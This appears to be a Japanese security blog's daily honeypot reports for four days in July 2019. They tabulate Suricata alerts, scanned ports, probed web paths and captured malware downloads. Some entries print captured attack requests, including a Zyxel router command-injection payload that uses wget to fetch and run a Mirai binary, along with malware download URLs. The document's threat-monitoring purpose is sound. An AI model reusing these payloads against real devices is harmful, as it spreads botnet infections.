Generic Protocol Command Decode SURICATA TCP option invalid length 5
Generic Protocol Command Decode SURICATA Applayer Wrong direction first Data 4
Generic Protocol Command Decode SURICATA STREAM 3way handshake wrong seq wrong ack 4
Generic Protocol Command Decode SURICATA STREAM excessive retransmissions 4
Generic Protocol Command Decode SURICATA TLS error message encountered 4
Generic Protocol Command Decode SURICATA TLS handshake invalid length 4
Attempted Administrator Privilege Gain ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 2
Generic Protocol Command Decode SURICATA HTTP unable to match response to request 2
Generic Protocol Command Decode SURICATA STREAM SHUTDOWN RST invalid ack 2
Generic Protocol Command Decode SURICATA STREAM bad window update 2
Misc activity ET INFO Cisco Smart Install Protocol Observed 2
Generic Protocol Command Decode SURICATA HTTP Host header invalid 1
Generic Protocol Command Decode SURICATA STREAM Last ACK with wrong seq 1

以上となります。

【ハニーポット簡易分析】Honeypot簡易分析(326日目:7/10)

ハニーポット簡易分析】Honeypot簡易分析(326日目:7/10)となります。

◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
 

f:id:one-chick-sec:20190713153719p:plain

<ポート検知数(30日平均比)>
ポート番号 サービス 件数 件数差(30日平均)
445 smb 4307 883
23 telnet 913 -314
5900 vnc 617 -310
2323 telnet 223 138
3389 rdp 75 -91
28017 Unknown  74 73
3307 opsession-prxy 67 19
1521 ncube-lm 55 52
443 https 44 2
111 sunrpc 42 33
<新規マルウェアダウンロード>
なし

◾️WoWHoneeypot
<国別検知数および検知数>

f:id:one-chick-sec:20190713154520p:plain

<検知パス一覧>
wow_path_research target CVE reference count
/ - - - 30
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 19
hxxp://110.249.212.46/testget Unauthorized Relay - - 14
/TP/public/index.php ThinkPHP - - 3
/.svn/entries       1
/ipc$ IPC - https://thinline196.hatenablog.com/entry/2018/09/23/153019 1
/mysql/admin/index.php PhpMyAdmin - - 1
/webadmin/script       1
hxxp://172.247.32.25/ddd.html Unauthorized Relay - - 1
<新規検知パス一覧>
なし
マルウェアダウンロード>
なし
 
以上となります。

【ハニーポット簡易分析】Honeypot簡易分析(325日目:7/9)

ハニーポット簡易分析】Honeypot簡易分析(325日目:7/9)となります。

◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>

f:id:one-chick-sec:20190713134335p:plain

<ポート検知数(30日平均比)>
ポート番号 サービス 件数 件数差(30日平均)
445 smb 4403 917
23 telnet 868 -423
5900 vnc 423 -1736
502 asa-appl-proto 256 242
9200 Unknown 250 240
3306 mysql 215 37
3389 rdp 84 -100
3307 opsession-prxy 82 36
5000 commplex-main 75 70
1962 Unknown 69 67
<新規マルウェアダウンロード>

malware download ペイロード
103[.]83[.]157[.]46 POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
hxxp://116[.]206[.]177[.]144:93/xlk\ GET /_search?
hxxp://116[.]206[.]177[.]144:93/Down[.]exe GET /_search?
hxxp://116[.]206[.]177[.]144:93/xlk GET /_search?

Elasticsearchの脆弱性(CVE-2014-3120)を狙った攻撃を何件か検知していました。
最終的にはMiner系のマルウェアをダウンロードするものと推測されます。

◾️WoWHoneeypot
<国別検知数および検知数>

f:id:one-chick-sec:20190713134545p:plain

<検知パス一覧>
wow_path_research target CVE reference count
/ - - - 32
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 19
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup  Zyxel CVE-2017-6884

https://www.exploit-db.com/exploits/41782

2
/index.php - - - 1
/mysql/admin/index.php PhpMyAdmin - - 1
/phpmyadmin/index.php phpMyAdmin - - 1
/robots.txt - - - 1
hxxp://110[.]249.212.46/testget Unauthorized Relay - - 4
<新規検知パス一覧>
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup 
→Zyxel製のルータの脆弱性を狙ったものとなります。
https://www.exploit-db.com/exploits/41782

マルウェアダウンロード>
malware_wowhoneypot_report wow_path base64_wow_decrypted_report count
hxxp://134[.]209[.]230[.]124/bins/tron[.]mips /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20tmp;wget%20hxxp://xxx.xxx.xxx.xxx/bins/tron.mips;chmod%20777%20tron.mips;./tron.mips%20zyxelv2 HTTP/1.1.Host: xxx.xxx.xxx.xxx.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.17.1.el6.x86_64.. 1
hxxp://134[.]209[.]230[.]124/bins/tron[.]mpsl /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20tmp;wget%20hxxp://xxx.xxx.xxx.xxx/bins/tron.mpsl;chmod%20777%20tron.mpsl;./tron.mpsl%20zyxelv2 HTTP/1.1.Host: xxx.xxx.xxx.xxx.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.17.1.el6.x86_64..
Zyxel製のルータの脆弱性からMiraiの感染を狙った攻撃となります。
https://www.virustotal.com/gui/file/50416814e217eb2d04a8b8431ef62e7bb54a57b51794bff235ff791ead0d3e37/detection

以上となります。



【ハニーポット簡易分析】Honeypot簡易分析(324日目:7/8)

ハニーポット簡易分析】Honeypot簡易分析(324日目:7/8)となります。

◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>

f:id:one-chick-sec:20190713120738p:plain

<ポート検知数(30日平均比)>
ポート番号 サービス 件数 件数差(30日平均)
445 smb 4821 1380
23 telnet 1100 -182
25 smtp 681 584
5900 vnc 606 -2055
3306 mysql 266 96
1433 ms-sql-s 242 201
2323 telnet 240 159
3389 rdp 115 -77
47808 bacnet 68 64
81 hosts2-ns 57 26

<新規マルウェアダウンロード>
なし

◾️WoWHoneeypot
<国別検知数および検知数>

f:id:one-chick-sec:20190713121004p:plain

<検知パス一覧>
wow_path_research target CVE reference count
/ - - - 28
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 19
hxxp://110[.]249.212.46/testget Unauthorized Relay - - 13
/TP/public/index.php ThinkPHP - - 3
/phpmyadmin/ phpMyAdmin - - 1
hxxp://112[.]124.42.80:63435/ Unauthorized Relay - - 1
 
<新規検知パス一覧>
なし
 
 
マルウェアダウンロード>
なし
 
以上となります。

【ハニーポット簡易分析】Honeypot簡易分析(323日目:7/7)

ハニーポット簡易分析】Honeypot簡易分析(323日目:7/7)となります。

◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>

f:id:one-chick-sec:20190713115309p:plain

<ポート検知数(30日平均比)>
ポート番号 サービス 件数 件数差(30日平均)
445 smb 3192 -261
23 telnet 2690 1185
25 smtp 880 794
5900 vnc 533 -2481
3306 mysql 359 190
503 intrinsa 256 252
3389 rdp 112 -88
2323 telnet 96 9
1200 Unknown  69 68
34567 Unknown 69 61

<新規マルウェアダウンロード>
malware download payload(例)
fxp://45[.]76[.]66[.]122/160[.]16[.]145[.]183[.]conf G7.`......copy system:running-config 
hxxp://87[.]120[.]254[.]184/sh/adb_bb_curl[.]sh CNXN............M
hxxp:/\/103[.]83[.]157[.]46/arm7 GET /shell

◾️WoWHoneeypot
<国別検知数および検知数>

f:id:one-chick-sec:20190713120047p:plain

<検知パス一覧>
path target CVE reference count
/ - - - 256
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 152
/manager/html Tomcat - - 16
hxxp://110.249.212.46/testget Unauthorized Relay - - 9
/favicon.ico - - - 8
/robots.txt - - - 8
/index.php - - - 3
/phpmyadmin/index.php phpMyAdmin - - 3
/HNAP1/ D-Link DIR-850L CVE-2015-2051 https://www.morihi-soc.net/?p=981 1
<新規検知パス一覧>
検知なし
 
マルウェアダウンロード>
検知なし
 
以上となります。